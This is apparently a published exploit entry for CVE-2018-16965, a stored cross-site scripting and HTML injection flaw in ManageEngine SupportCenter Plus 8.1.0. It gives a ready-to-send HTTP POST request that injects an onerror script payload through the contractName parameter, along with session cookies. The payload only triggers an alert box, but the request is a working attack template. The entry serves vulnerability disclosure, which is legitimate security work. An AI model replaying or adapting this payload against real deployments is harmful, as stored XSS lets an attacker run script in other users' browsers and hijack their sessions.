# Exploit Title: ManageEngine SupportCenter Plus 8.1.0 - HTML Injection and Stored XSS # Date: 2018-09-12 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.manageengine.com/ # Hardware Link : https://www.manageengine.com/products/support-center/ # Software : ZOHO Corp ManageEngine SupportCenter Plus # Product Version : 8.1.0 # Build Number : 8106 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : CVE-2018-16965 In Zoho ManageEngine SupportCenter Plus 8.1.0, there is HTML Injection and Stored XSS via the /ServiceContractDef.do contractName parameter. # HTTP Request Header : POST /ServiceContractDef.do HTTP/1.1 Host: demo.supportcenterplus.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://demo.supportcenterplus.com/ServiceContractDef.do Cookie: JSESSIONID=A23F9A80AF7BA95A4D3D1ADA0753BB00; JSESSIONIDSSO=4A3C963EDC44F7D4E50067D34DCDC1E6; [object HTMLDivElement]=hide Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 604 contractName=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27ismailtasdelen%27%29%3E&contractID=&contractInfoID=&contractMode=&createdBy=&services=&supportPlanRates=1%3D0.0&contractNumber=¤tDate=2018-09-12&fromDate=2018-09-12&toDate=2018-09-13&productList=&radio1=allProd&customerName=ismailtasdelen&description=&supportPlanID=1&supportPlanType=Hour+Based&rateTypeCost=0.0&totalCost=0.0&noofHours=0&noofMins=0&noofIncidents=0&servicename=&servicedesc=&attach=&attPath=&component=ServiceContract&attSize=&attachments=&selected=&beforeDays=00&beforeEnd=00&addContract=Save